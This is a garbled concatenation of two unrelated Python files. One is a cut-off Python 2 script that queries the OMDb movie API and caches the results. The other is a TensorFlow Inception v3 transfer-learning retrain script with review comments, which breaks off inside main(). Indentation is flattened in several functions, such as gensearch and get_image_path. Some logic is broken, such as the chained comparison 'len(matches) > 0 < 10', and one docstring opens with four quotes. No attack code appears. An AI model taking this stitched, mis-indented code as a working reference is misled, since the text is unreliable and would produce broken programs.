if thefile is not None:
thefile.close()
if ret:
return loaded
def localfiles (format="json"):
    """Return names of files in the working directory with the given extension.

    :param format: File extension to match (without the dot).
    :return: List of matching file names.
    """
    return glob.glob("*." + format)
#===============================================================================
# GET DATA FROM OMDB API - IMDB ID
#===============================================================================
def withid (theid):
    """Fetch one movie record from the OMDb API by IMDb id and cache it.

    The record is appended to the module-level cache unless an entry with
    the same key is already present.

    :param theid: IMDb id to look up.
    """
    global cache
    theurl = "{0}{1}{2}{3}{4}".format(OMDBURL, Q[1], theid, PLOT[1], QOP[3])
    movdata = json.load(urllib2.urlopen(theurl))
    already_cached = [mov for mov in cache
                      if movdata[MKEY[1]] == mov[MKEY[1]]]
    if not already_cached:
        cache.append(movdata)
#===============================================================================
# GET DATA FROM OMDB API - TITLE
#===============================================================================
def withtitle (thetitle, year=None):
    """Fetch a movie from the OMDb API by exact title and cache it.

    The record is appended to the module-level cache unless an entry with
    the same key is already present.

    :param thetitle: Movie title to look up (will be URL-encoded).
    :param year: Optional release year used to narrow the query.
    """
    # Declared for consistency with withid; the cache is only mutated
    # in place, never rebound.
    global cache
    dupe = False
    newtitle = enctitle(thetitle)
    # Build exactly one URL.  (Previously both variants were computed
    # unconditionally here and then recomputed inside the branches --
    # dead code -- and the branches tested `year == None` / `year != None`
    # instead of using identity comparison with an else.)
    if year is None:
        theurl = "{0}{1}{2}{3}{4}".format(
            OMDBURL, Q[2], newtitle, PLOT[1], QOP[3])
    else:
        theurl = "{0}{1}{2}{3}{4}{5}{6}".format(
            OMDBURL, Q[2], newtitle, QOP[0], year, PLOT[1], QOP[3])
    response = urllib2.urlopen(theurl)
    movdata = json.load(response)
    for mov in cache:
        if movdata[MKEY[1]] == mov[MKEY[1]]:
            dupe = True
    if not dupe:
        cache.append(movdata)
#===============================================================================
# GET DATA FROM OMDB API - GENERAL SEARCH
#===============================================================================
def gensearch (thetitle):
""""""
matches = []
newtitle = enctitle(thetitle)
theurl = "{0}{1}{2}".format(OMDBURL, Q[0], newtitle)
response = urllib2.urlopen(theurl)
movdata = json.load(response)
for mov in movdata[MKEY[1]]:
if mov[MKEY[2]] == "movie":
matches.append(mov)
if len(matches) > 0 < 10:
index = 1
print "Which one?" + NL
for mov in matches:
print "[{0}] {1} ({2})".format(str(index), mov[MKEY[3]],
mov[MKEY[4]])
index += 1
print
newchoice = raw_input("Enter 1 - " + str(len(matches)) + ": ")
newchoice = int(newchoice) - 1
withid(matches[newchoice][MKEY[1]])
#===============================================================================
# MISC. FUNCTIONS
#===============================================================================
def enctitle (title):
    """Percent-encode *title* so it can be embedded in an OMDb query URL.

    :param title: Raw title string.
    :return: URL-safe encoded string.
    """
    return urllib2.quote(title)
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple transfer learning with an Inception v3 architecture model which
displays summaries in TensorBoard.
This example shows how to take a Inception v3 architecture model trained on
ImageNet images, and train a new top layer that can recognize other classes of
images.
The top layer receives as input a 2048-dimensional vector for each image. We
train a softmax layer on top of this representation. Assuming the softmax layer
contains N labels, this corresponds to learning N + 2048*N model parameters
corresponding to the learned biases and weights.
Here's an example, which assumes you have a folder containing class-named
subfolders, each full of images for each label. The example folder flower_photos
should have a structure like this:
~/flower_photos/daisy/photo1.jpg
~/flower_photos/daisy/photo2.jpg
...
~/flower_photos/rose/anotherphoto77.jpg
...
~/flower_photos/sunflower/somepicture.jpg
The subfolder names are important, since they define what label is applied to
each image, but the filenames themselves don't matter. Once your images are
prepared, you can run the training with a command like this:
bazel build tensorflow/examples/image_retraining:retrain && \
bazel-bin/tensorflow/examples/image_retraining/retrain \
--image_dir ~/flower_photos
You can replace the image_dir argument with any folder containing subfolders of
images. The label for each image is taken from the name of the subfolder it's
in.
This produces a new model file that can be loaded and run by any TensorFlow
program, for example the label_image sample code.
To use with TensorBoard:
By default, this script will log summaries to /tmp/retrain_logs directory
Visualize the summaries with this command:
tensorboard --logdir /tmp/retrain_logs
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from datetime import datetime
import hashlib
import os.path
import random
import re
import struct
import os
import sys
import tarfile
import numpy as np
from six.moves import urllib
import tensorflow as tf
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import gfile
from tensorflow.python.util import compat
FLAGS = None
# These are all parameters that are tied to the particular model architecture
# we're using for Inception v3. These include things like tensor names and their
# sizes. If you want to adapt this script to work with another model, you will
# need to update these to reflect the values in the network you're using.
# pylint: disable=line-too-long
DATA_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
# pylint: enable=line-too-long
BOTTLENECK_TENSOR_NAME = 'pool_3/_reshape:0'
BOTTLENECK_TENSOR_SIZE = 2048
MODEL_INPUT_WIDTH = 299
MODEL_INPUT_HEIGHT = 299
MODEL_INPUT_DEPTH = 3
JPEG_DATA_TENSOR_NAME = 'DecodeJpeg/contents:0'
RESIZED_INPUT_TENSOR_NAME = 'ResizeBilinear:0'
MAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M
def create_image_lists(image_dir, testing_percentage, validation_percentage):
  """Builds a list of training images from the file system.

  Analyzes the sub folders in the image directory, splits them into stable
  training, testing, and validation sets, and returns a data structure
  describing the lists of images for each label and their paths.

  Args:
    image_dir: String path to a folder containing subfolders of images.
    testing_percentage: Integer percentage of the images to reserve for tests.
    validation_percentage: Integer percentage of images reserved for validation.

  Returns:
    A dictionary containing an entry for each label subfolder, with images split
    into training, testing, and validation sets within each label, or None if
    image_dir does not exist.
  """
  if not gfile.Exists(image_dir):
    print("Image directory '" + image_dir + "' not found.")
    return None
  result = {}
  sub_dirs = [x[0] for x in gfile.Walk(image_dir)]
  # Hoisted out of the per-directory loop: the accepted extensions are
  # loop-invariant. NOTE(review): on case-insensitive filesystems the 'jpg'
  # and 'JPG' globs can match the same files twice -- confirm duplicates are
  # acceptable here.
  extensions = ['jpg', 'jpeg', 'JPG', 'JPEG']
  # The root directory comes first, so skip it.
  is_root_dir = True
  for sub_dir in sub_dirs:
    if is_root_dir:
      is_root_dir = False
      continue
    file_list = []
    dir_name = os.path.basename(sub_dir)
    if dir_name == image_dir:
      continue
    print("Looking for images in '" + dir_name + "'")
    for extension in extensions:
      file_glob = os.path.join(image_dir, dir_name, '*.' + extension)
      file_list.extend(gfile.Glob(file_glob))
    if not file_list:
      print('No files found')
      continue
    if len(file_list) < 20:
      print('WARNING: Folder has less than 20 images, which may cause issues.')
    elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:
      print('WARNING: Folder {} has more than {} images. Some images will '
            'never be selected.'.format(dir_name, MAX_NUM_IMAGES_PER_CLASS))
    # Labels are the folder names, lower-cased, with runs of non-alphanumeric
    # characters collapsed to single spaces.
    label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())
    training_images = []
    testing_images = []
    validation_images = []
    for file_name in file_list:
      base_name = os.path.basename(file_name)
      # We want to ignore anything after '_nohash_' in the file name when
      # deciding which set to put an image in, the data set creator has a way
      # of grouping photos that are close variations of each other. For example
      # this is used in the plant disease data set to group multiple pictures
      # of the same leaf.
      hash_name = re.sub(r'_nohash_.*$', '', file_name)
      # This looks a bit magical, but we need to decide whether this file
      # should go into the training, testing, or validation sets, and we want
      # to keep existing files in the same set even if more files are
      # subsequently added.
      # To do that, we need a stable way of deciding based on just the file
      # name itself, so we do a hash of that and then use that to generate a
      # probability value that we use to assign it.
      hash_name_hashed = hashlib.sha1(compat.as_bytes(hash_name)).hexdigest()
      percentage_hash = ((int(hash_name_hashed, 16) %
                          (MAX_NUM_IMAGES_PER_CLASS + 1)) *
                         (100.0 / MAX_NUM_IMAGES_PER_CLASS))
      if percentage_hash < validation_percentage:
        validation_images.append(base_name)
      elif percentage_hash < (testing_percentage + validation_percentage):
        testing_images.append(base_name)
      else:
        training_images.append(base_name)
    result[label_name] = {
        'dir': dir_name,
        'training': training_images,
        'testing': testing_images,
        'validation': validation_images,
    }
  return result
def get_image_path(image_lists, label_name, index, image_dir, category):
""""Returns a path to an image for a label at the given index.
Args:
image_lists: Dictionary of training images for each label.
label_name: Label string we want to get an image for.
index: Int offset of the image we want. This will be moduloed by the
available number of images for the label, so it can be arbitrarily large.
image_dir: Root folder string of the subfolders containing the training
images.
category: Name string of set to pull images from - training, testing, or
validation.
Returns:
File system path string to an image that meets the requested parameters.
"""
if label_name not in image_lists:
tf.logging.fatal('Label does not exist %s.', label_name)
label_lists = image_lists[label_name]
if category not in label_lists:
tf.logging.fatal('Category does not exist %s.', category)
category_list = label_lists[category]
if not category_list:
tf.logging.fatal('Label %s has no images in the category %s.',
label_name, category)
mod_index = index % len(category_list)
base_name = category_list[mod_index]
sub_dir = label_lists['dir']
full_path = os.path.join(image_dir, sub_dir, base_name)
return full_path
def get_bottleneck_path(image_lists, label_name, index, bottleneck_dir,
                        category):
  """Returns a path to a bottleneck file for a label at the given index.

  The bottleneck path mirrors the image path, rooted at bottleneck_dir and
  with a '.txt' suffix appended.

  Args:
    image_lists: Dictionary of training images for each label.
    label_name: Label string we want to get an image for.
    index: Integer offset of the image we want. This will be moduloed by the
    available number of images for the label, so it can be arbitrarily large.
    bottleneck_dir: Folder string holding cached files of bottleneck values.
    category: Name string of set to pull images from - training, testing, or
    validation.

  Returns:
    File system path string to a bottleneck file for the requested image.
  """
  image_path = get_image_path(image_lists, label_name, index, bottleneck_dir,
                              category)
  return image_path + '.txt'
def create_inception_graph():
  """Creates a graph from saved GraphDef file and returns a Graph object.

  Returns:
    Graph holding the trained Inception network, and various tensors we'll be
    manipulating.
  """
  with tf.Graph().as_default() as graph:
    model_filename = os.path.join(
        FLAGS.model_dir, 'classify_image_graph_def.pb')
    with gfile.FastGFile(model_filename, 'rb') as f:
      graph_def = tf.GraphDef()
      graph_def.ParseFromString(f.read())
      # Import the serialized graph and grab handles to the three tensors we
      # need: the bottleneck output, the raw-jpeg input, and the resized-image
      # input. name='' keeps the original node names unprefixed.
      bottleneck_tensor, jpeg_data_tensor, resized_input_tensor = (
          tf.import_graph_def(graph_def, name='', return_elements=[
              BOTTLENECK_TENSOR_NAME, JPEG_DATA_TENSOR_NAME,
              RESIZED_INPUT_TENSOR_NAME]))
  return graph, bottleneck_tensor, jpeg_data_tensor, resized_input_tensor
def run_bottleneck_on_image(sess, image_data, image_data_tensor,
                            bottleneck_tensor):
  """Runs inference on an image to extract the 'bottleneck' summary layer.

  Args:
    sess: Current active TensorFlow Session.
    image_data: String of raw JPEG data.
    image_data_tensor: Input data layer in the graph.
    bottleneck_tensor: Layer before the final softmax.

  Returns:
    Numpy array of bottleneck values.
  """
  feed = {image_data_tensor: image_data}
  raw_values = sess.run(bottleneck_tensor, feed)
  # Collapse singleton axes (e.g. the batch dimension) to a flat vector.
  return np.squeeze(raw_values)
def maybe_download_and_extract():
  """Download and extract model tar file.

  If the pretrained model we're using doesn't already exist, this function
  downloads it from the TensorFlow.org website and unpacks it into a directory.
  """
  dest_directory = FLAGS.model_dir
  if not os.path.exists(dest_directory):
    os.makedirs(dest_directory)
  filename = DATA_URL.split('/')[-1]
  filepath = os.path.join(dest_directory, filename)
  if not os.path.exists(filepath):
    # Progress callback invoked by urlretrieve after each received block.
    def _progress(count, block_size, total_size):
      sys.stdout.write('\r>> Downloading %s %.1f%%' %
                       (filename,
                        float(count * block_size) / float(total_size) * 100.0))
      sys.stdout.flush()
    filepath, _ = urllib.request.urlretrieve(DATA_URL,
                                             filepath,
                                             _progress)
    print()
    statinfo = os.stat(filepath)
    print('Successfully downloaded', filename, statinfo.st_size, 'bytes.')
  # Extraction runs unconditionally, even when the tarball was already cached.
  tarfile.open(filepath, 'r:gz').extractall(dest_directory)
def ensure_dir_exists(dir_name):
  """Makes sure the folder exists on disk.

  Uses try/except rather than check-then-create, so it is safe against the
  race where another process creates the directory between the existence
  check and the makedirs call (the previous version could raise in that case).

  Args:
    dir_name: Path string to the folder we want to create.
  """
  try:
    os.makedirs(dir_name)
  except OSError:
    # Already existing is fine; re-raise real failures (permissions, etc.).
    if not os.path.isdir(dir_name):
      raise
def write_list_of_floats_to_file(list_of_floats, file_path):
  """Writes a given list of floats to a binary file.

  Fixes the PEP 8 violation in the original signature (stray space before the
  comma); callers using positional or keyword arguments are unaffected.

  Args:
    list_of_floats: List of exactly BOTTLENECK_TENSOR_SIZE floats to write.
    file_path: Path to a file where list of floats will be stored.
  """
  # 'd' packs each value as a native-endian C double (8 bytes per float).
  s = struct.pack('d' * BOTTLENECK_TENSOR_SIZE, *list_of_floats)
  with open(file_path, 'wb') as f:
    f.write(s)
def read_list_of_floats_from_file(file_path):
  """Reads list of floats from a given file.

  Args:
    file_path: Path to a file where list of floats was stored.

  Returns:
    Array of bottleneck values (list of floats).
  """
  # One native-endian C double per bottleneck value.
  fmt = 'd' * BOTTLENECK_TENSOR_SIZE
  with open(file_path, 'rb') as f:
    unpacked = struct.unpack(fmt, f.read())
  return list(unpacked)
# Module-level cache mapping bottleneck file paths to their float values.
# NOTE(review): appears unused in this part of the file -- confirm before
# removing.
bottleneck_path_2_bottleneck_values = {}
def create_bottleneck_file(bottleneck_path, image_lists, label_name, index,
                           image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor):
  """Computes the bottleneck for one image and caches it to disk.

  Reads the JPEG for the requested image, runs it through the network up to
  the bottleneck layer, and writes the resulting values to bottleneck_path as
  a single comma-separated line of floats.

  Args:
    bottleneck_path: Destination file path for the cached values.
    image_lists: Dictionary of training images for each label.
    label_name: Label string we want to get an image for.
    index: Integer offset of the image within its category list.
    image_dir: Root folder string of the subfolders containing the images.
    category: Name string of set - training, testing, or validation.
    sess: Current active TensorFlow Session.
    jpeg_data_tensor: Input tensor for jpeg data from file.
    bottleneck_tensor: The bottleneck output tensor.
  """
  print('Creating bottleneck at ' + bottleneck_path)
  image_path = get_image_path(image_lists, label_name, index, image_dir, category)
  if not gfile.Exists(image_path):
    tf.logging.fatal('File does not exist %s', image_path)
  image_data = gfile.FastGFile(image_path, 'rb').read()
  bottleneck_values = run_bottleneck_on_image(sess, image_data, jpeg_data_tensor, bottleneck_tensor)
  # Serialized as text so the cache is human-inspectable.
  bottleneck_string = ','.join(str(x) for x in bottleneck_values)
  with open(bottleneck_path, 'w') as bottleneck_file:
    bottleneck_file.write(bottleneck_string)
def get_or_create_bottleneck(sess, image_lists, label_name, index, image_dir,
                             category, bottleneck_dir, jpeg_data_tensor,
                             bottleneck_tensor):
  """Retrieves or calculates bottleneck values for an image.

  If a cached version of the bottleneck data exists on-disk, return that,
  otherwise calculate the data and save it to disk for future use.

  Args:
    sess: The current active TensorFlow Session.
    image_lists: Dictionary of training images for each label.
    label_name: Label string we want to get an image for.
    index: Integer offset of the image we want. This will be modulo-ed by the
    available number of images for the label, so it can be arbitrarily large.
    image_dir: Root folder string of the subfolders containing the training
    images.
    category: Name string of which set to pull images from - training, testing,
    or validation.
    bottleneck_dir: Folder string holding cached files of bottleneck values.
    jpeg_data_tensor: The tensor to feed loaded jpeg data into.
    bottleneck_tensor: The output tensor for the bottleneck values.

  Returns:
    List of values produced by the bottleneck layer for the image.
  """
  label_lists = image_lists[label_name]
  sub_dir = label_lists['dir']
  sub_dir_path = os.path.join(bottleneck_dir, sub_dir)
  ensure_dir_exists(sub_dir_path)
  bottleneck_path = get_bottleneck_path(image_lists, label_name, index,
                                        bottleneck_dir, category)
  if not os.path.exists(bottleneck_path):
    create_bottleneck_file(bottleneck_path, image_lists, label_name, index,
                           image_dir, category, sess, jpeg_data_tensor,
                           bottleneck_tensor)
  with open(bottleneck_path, 'r') as bottleneck_file:
    bottleneck_string = bottleneck_file.read()
  did_hit_error = False
  try:
    bottleneck_values = [float(x) for x in bottleneck_string.split(',')]
  except ValueError:
    # Was a bare 'except:', which also swallowed KeyboardInterrupt/SystemExit;
    # float() only raises ValueError on a corrupt cache file.
    print("Invalid float found, recreating bottleneck")
    did_hit_error = True
  if did_hit_error:
    create_bottleneck_file(bottleneck_path, image_lists, label_name, index,
                           image_dir, category, sess, jpeg_data_tensor,
                           bottleneck_tensor)
    with open(bottleneck_path, 'r') as bottleneck_file:
      bottleneck_string = bottleneck_file.read()
    # Allow exceptions to propagate here, since they shouldn't happen after a
    # fresh creation.
    bottleneck_values = [float(x) for x in bottleneck_string.split(',')]
  return bottleneck_values
def cache_bottlenecks(sess, image_lists, image_dir, bottleneck_dir,
                      jpeg_data_tensor, bottleneck_tensor):
  """Ensures all the training, testing, and validation bottlenecks are cached.

  Because we're likely to read the same image multiple times (if there are no
  distortions applied during training) it can speed things up a lot if we
  calculate the bottleneck layer values once for each image during
  preprocessing, and then just read those cached values repeatedly during
  training. Here we go through all the images we've found, calculate those
  values, and save them off.

  Args:
    sess: The current active TensorFlow Session.
    image_lists: Dictionary of training images for each label.
    image_dir: Root folder string of the subfolders containing the training
    images.
    bottleneck_dir: Folder string holding cached files of bottleneck values.
    jpeg_data_tensor: Input tensor for jpeg data from file.
    bottleneck_tensor: The penultimate output layer of the graph.

  Returns:
    Nothing.
  """
  ensure_dir_exists(bottleneck_dir)
  num_cached = 0
  for label_name, label_lists in image_lists.items():
    for category in ('training', 'testing', 'validation'):
      for index, _ in enumerate(label_lists[category]):
        get_or_create_bottleneck(sess, image_lists, label_name, index,
                                 image_dir, category, bottleneck_dir,
                                 jpeg_data_tensor, bottleneck_tensor)
        num_cached += 1
        # Periodic progress indicator for long preprocessing runs.
        if num_cached % 100 == 0:
          print(str(num_cached) + ' bottleneck files created.')
def get_random_cached_bottlenecks(sess, image_lists, how_many, category,
                                  bottleneck_dir, image_dir, jpeg_data_tensor,
                                  bottleneck_tensor):
  """Retrieves bottleneck values for cached images.

  If no distortions are being applied, this function can retrieve the cached
  bottleneck values directly from disk for images. It picks a random set of
  images from the specified category.

  Args:
    sess: Current TensorFlow Session.
    image_lists: Dictionary of training images for each label.
    how_many: If positive, a random sample of this size will be chosen.
    If negative, all bottlenecks will be retrieved.
    category: Name string of which set to pull from - training, testing, or
    validation.
    bottleneck_dir: Folder string holding cached files of bottleneck values.
    image_dir: Root folder string of the subfolders containing the training
    images.
    jpeg_data_tensor: The layer to feed jpeg image data into.
    bottleneck_tensor: The bottleneck output layer of the CNN graph.

  Returns:
    List of bottleneck arrays, their corresponding ground truths, and the
    relevant filenames.
  """
  class_count = len(image_lists.keys())
  bottlenecks = []
  ground_truths = []
  filenames = []

  def _add_sample(label_index, label_name, image_index):
    # Shared by both branches below (was duplicated): fetch one bottleneck
    # and record it with its one-hot ground truth and file name.
    image_name = get_image_path(image_lists, label_name, image_index,
                                image_dir, category)
    bottleneck = get_or_create_bottleneck(sess, image_lists, label_name,
                                          image_index, image_dir, category,
                                          bottleneck_dir, jpeg_data_tensor,
                                          bottleneck_tensor)
    ground_truth = np.zeros(class_count, dtype=np.float32)
    ground_truth[label_index] = 1.0
    bottlenecks.append(bottleneck)
    ground_truths.append(ground_truth)
    filenames.append(image_name)

  if how_many >= 0:
    # Retrieve a random sample of bottlenecks. The image index can exceed the
    # class size; get_image_path reduces it modulo the number of images.
    for _ in range(how_many):
      label_index = random.randrange(class_count)
      label_name = list(image_lists.keys())[label_index]
      _add_sample(label_index, label_name,
                  random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1))
  else:
    # Retrieve all bottlenecks.
    for label_index, label_name in enumerate(image_lists.keys()):
      for image_index, _ in enumerate(image_lists[label_name][category]):
        _add_sample(label_index, label_name, image_index)
  return bottlenecks, ground_truths, filenames
def get_random_distorted_bottlenecks(
    sess, image_lists, how_many, category, image_dir, input_jpeg_tensor,
    distorted_image, resized_input_tensor, bottleneck_tensor):
  """Retrieves bottleneck values for training images, after distortions.

  If we're training with distortions like crops, scales, or flips, we have to
  recalculate the full model for every image, and so we can't use cached
  bottleneck values. Instead we find random images for the requested category,
  run them through the distortion graph, and then the full graph to get the
  bottleneck results for each.

  Args:
    sess: Current TensorFlow Session.
    image_lists: Dictionary of training images for each label.
    how_many: The integer number of bottleneck values to return.
    category: Name string of which set of images to fetch - training, testing,
    or validation.
    image_dir: Root folder string of the subfolders containing the training
    images.
    input_jpeg_tensor: The input layer we feed the image data to.
    distorted_image: The output node of the distortion graph.
    resized_input_tensor: The input node of the recognition graph.
    bottleneck_tensor: The bottleneck output layer of the CNN graph.

  Returns:
    List of bottleneck arrays and their corresponding ground truths.
  """
  class_count = len(image_lists.keys())
  bottlenecks = []
  ground_truths = []
  for unused_i in range(how_many):
    label_index = random.randrange(class_count)
    label_name = list(image_lists.keys())[label_index]
    # The index can exceed the class size; get_image_path reduces it modulo
    # the number of available images.
    image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)
    image_path = get_image_path(image_lists, label_name, image_index, image_dir,
                                category)
    if not gfile.Exists(image_path):
      tf.logging.fatal('File does not exist %s', image_path)
    jpeg_data = gfile.FastGFile(image_path, 'rb').read()
    # Note that we materialize the distorted_image_data as a numpy array before
    # sending running inference on the image. This involves 2 memory copies and
    # might be optimized in other implementations.
    distorted_image_data = sess.run(distorted_image,
                                    {input_jpeg_tensor: jpeg_data})
    bottleneck = run_bottleneck_on_image(sess, distorted_image_data,
                                         resized_input_tensor,
                                         bottleneck_tensor)
    # One-hot label vector for this sample.
    ground_truth = np.zeros(class_count, dtype=np.float32)
    ground_truth[label_index] = 1.0
    bottlenecks.append(bottleneck)
    ground_truths.append(ground_truth)
  return bottlenecks, ground_truths
def should_distort_images(flip_left_right, random_crop, random_scale,
                          random_brightness):
  """Whether any distortions are enabled, from the input flags.

  Args:
    flip_left_right: Boolean whether to randomly mirror images horizontally.
    random_crop: Integer percentage setting the total margin used around the
    crop box.
    random_scale: Integer percentage of how much to vary the scale by.
    random_brightness: Integer range to randomly multiply the pixel values by.

  Returns:
    Boolean value indicating whether any distortions should be applied.
  """
  distortion_flags = (flip_left_right,
                      random_crop != 0,
                      random_scale != 0,
                      random_brightness != 0)
  return any(distortion_flags)
def add_input_distortions(flip_left_right, random_crop, random_scale,
                          random_brightness):
  """Creates the operations to apply the specified distortions.

  During training it can help to improve the results if we run the images
  through simple distortions like crops, scales, and flips. These reflect the
  kind of variations we expect in the real world, and so can help train the
  model to cope with natural data more effectively. Here we take the supplied
  parameters and construct a network of operations to apply them to an image.

  Cropping
  ~~~~~~~~

  Cropping is done by placing a bounding box at a random position in the full
  image. The cropping parameter controls the size of that box relative to the
  input image. If it's zero, then the box is the same size as the input and no
  cropping is performed. If the value is 50%, then the crop box will be half the
  width and height of the input. In a diagram it looks like this:

  <       width         >
  +---------------------+
  |                     |
  |   width - crop%     |
  |    <      >         |
  |    +------+         |
  |    |      |         |
  |    |      |         |
  |    |      |         |
  |    +------+         |
  |                     |
  |                     |
  +---------------------+

  Scaling
  ~~~~~~~

  Scaling is a lot like cropping, except that the bounding box is always
  centered and its size varies randomly within the given range. For example if
  the scale percentage is zero, then the bounding box is the same size as the
  input and no scaling is applied. If it's 50%, then the bounding box will be in
  a random range between half the width and height and full size.

  Args:
    flip_left_right: Boolean whether to randomly mirror images horizontally.
    random_crop: Integer percentage setting the total margin used around the
    crop box.
    random_scale: Integer percentage of how much to vary the scale by.
    random_brightness: Integer range to randomly multiply the pixel values by.

  Returns:
    The jpeg input layer and the distorted result tensor.
  """
  # Decode the raw jpeg and add an explicit batch dimension so the resize op
  # below can operate on it.
  jpeg_data = tf.placeholder(tf.string, name='DistortJPGInput')
  decoded_image = tf.image.decode_jpeg(jpeg_data, channels=MODEL_INPUT_DEPTH)
  decoded_image_as_float = tf.cast(decoded_image, dtype=tf.float32)
  decoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)
  # Combined pre-crop scale: a fixed margin for the crop plus a random
  # per-image resize factor drawn from [1.0, resize_scale).
  margin_scale = 1.0 + (random_crop / 100.0)
  resize_scale = 1.0 + (random_scale / 100.0)
  margin_scale_value = tf.constant(margin_scale)
  resize_scale_value = tf.random_uniform(tensor_shape.scalar(),
                                         minval=1.0,
                                         maxval=resize_scale)
  scale_value = tf.multiply(margin_scale_value, resize_scale_value)
  precrop_width = tf.multiply(scale_value, MODEL_INPUT_WIDTH)
  precrop_height = tf.multiply(scale_value, MODEL_INPUT_HEIGHT)
  precrop_shape = tf.stack([precrop_height, precrop_width])
  precrop_shape_as_int = tf.cast(precrop_shape, dtype=tf.int32)
  precropped_image = tf.image.resize_bilinear(decoded_image_4d,
                                              precrop_shape_as_int)
  # NOTE(review): squeeze_dims is the pre-1.x spelling of the 'axis' argument
  # -- confirm against the TF version this script targets before renaming.
  precropped_image_3d = tf.squeeze(precropped_image, squeeze_dims=[0])
  cropped_image = tf.random_crop(precropped_image_3d,
                                 [MODEL_INPUT_HEIGHT, MODEL_INPUT_WIDTH,
                                  MODEL_INPUT_DEPTH])
  if flip_left_right:
    flipped_image = tf.image.random_flip_left_right(cropped_image)
  else:
    flipped_image = cropped_image
  # Random brightness is applied as a multiplicative factor drawn from
  # [1 - b/100, 1 + b/100).
  brightness_min = 1.0 - (random_brightness / 100.0)
  brightness_max = 1.0 + (random_brightness / 100.0)
  brightness_value = tf.random_uniform(tensor_shape.scalar(),
                                       minval=brightness_min,
                                       maxval=brightness_max)
  brightened_image = tf.multiply(flipped_image, brightness_value)
  distort_result = tf.expand_dims(brightened_image, 0, name='DistortResult')
  return jpeg_data, distort_result
def variable_summaries(var):
  """Attach a lot of summaries to a Tensor (for TensorBoard visualization).

  Records mean, standard deviation, max, min, and a histogram of the given
  tensor under a 'summaries' name scope.

  Args:
    var: The tensor to summarize.
  """
  with tf.name_scope('summaries'):
    mean = tf.reduce_mean(var)
    tf.summary.scalar('mean', mean)
    with tf.name_scope('stddev'):
      stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
    tf.summary.scalar('stddev', stddev)
    tf.summary.scalar('max', tf.reduce_max(var))
    tf.summary.scalar('min', tf.reduce_min(var))
    tf.summary.histogram('histogram', var)
def add_final_training_ops(class_count, final_tensor_name, bottleneck_tensor):
  """Adds a new softmax and fully-connected layer for training.

  We need to retrain the top layer to identify our new classes, so this function
  adds the right operations to the graph, along with some variables to hold the
  weights, and then sets up all the gradients for the backward pass.

  The set up for the softmax and fully-connected layers is based on:
  https://tensorflow.org/versions/master/tutorials/mnist/beginners/index.html

  Args:
    class_count: Integer of how many categories of things we're trying to
    recognize.
    final_tensor_name: Name string for the new final node that produces results.
    bottleneck_tensor: The output of the main CNN graph.

  Returns:
    The tensors for the training and cross entropy results, and tensors for the
    bottleneck input and ground truth input.
  """
  with tf.name_scope('input'):
    # placeholder_with_default lets inference run straight from the CNN's
    # bottleneck output while training feeds cached values instead.
    bottleneck_input = tf.placeholder_with_default(
        bottleneck_tensor, shape=[None, BOTTLENECK_TENSOR_SIZE],
        name='BottleneckInputPlaceholder')
    ground_truth_input = tf.placeholder(tf.float32,
                                        [None, class_count],
                                        name='GroundTruthInput')
  # Organizing the following ops as `final_training_ops` so they're easier
  # to see in TensorBoard
  layer_name = 'final_training_ops'
  with tf.name_scope(layer_name):
    with tf.name_scope('weights'):
      layer_weights = tf.Variable(tf.truncated_normal([BOTTLENECK_TENSOR_SIZE, class_count], stddev=0.001), name='final_weights')
      variable_summaries(layer_weights)
    with tf.name_scope('biases'):
      layer_biases = tf.Variable(tf.zeros([class_count]), name='final_biases')
      variable_summaries(layer_biases)
    with tf.name_scope('Wx_plus_b'):
      logits = tf.matmul(bottleneck_input, layer_weights) + layer_biases
      tf.summary.histogram('pre_activations', logits)
  final_tensor = tf.nn.softmax(logits, name=final_tensor_name)
  tf.summary.histogram('activations', final_tensor)
  with tf.name_scope('cross_entropy'):
    # Cross entropy is computed from the raw logits, not the softmax output.
    cross_entropy = tf.nn.softmax_cross_entropy_with_logits(
        labels=ground_truth_input, logits=logits)
    with tf.name_scope('total'):
      cross_entropy_mean = tf.reduce_mean(cross_entropy)
  tf.summary.scalar('cross_entropy', cross_entropy_mean)
  with tf.name_scope('train'):
    train_step = tf.train.GradientDescentOptimizer(FLAGS.learning_rate).minimize(
        cross_entropy_mean)
  return (train_step, cross_entropy_mean, bottleneck_input, ground_truth_input,
          final_tensor)
def add_evaluation_step(result_tensor, ground_truth_tensor):
  """Inserts the operations we need to evaluate the accuracy of our results.

  Args:
    result_tensor: The new final node that produces results.
    ground_truth_tensor: The node we feed ground truth data
    into.

  Returns:
    Tuple of (evaluation step, prediction).
  """
  with tf.name_scope('accuracy'):
    with tf.name_scope('correct_prediction'):
      # Accuracy compares the argmax of the softmax output against the argmax
      # of the one-hot ground truth.
      prediction = tf.argmax(result_tensor, 1)
      correct_prediction = tf.equal(
          prediction, tf.argmax(ground_truth_tensor, 1))
    with tf.name_scope('accuracy'):
      evaluation_step = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
  tf.summary.scalar('accuracy', evaluation_step)
  return evaluation_step, prediction
def main(_):
  """Entry point: retrains the top layer of Inception v3 on FLAGS.image_dir.

  Downloads the pretrained model if needed, builds the image lists, caches or
  recomputes bottlenecks, trains the new final layer, reports accuracy, and
  writes the resulting graph and labels to FLAGS.output_graph /
  FLAGS.output_labels.
  """
  # Setup the directory we'll write summaries to for TensorBoard
  if tf.gfile.Exists(FLAGS.summaries_dir):
    tf.gfile.DeleteRecursively(FLAGS.summaries_dir)
  tf.gfile.MakeDirs(FLAGS.summaries_dir)
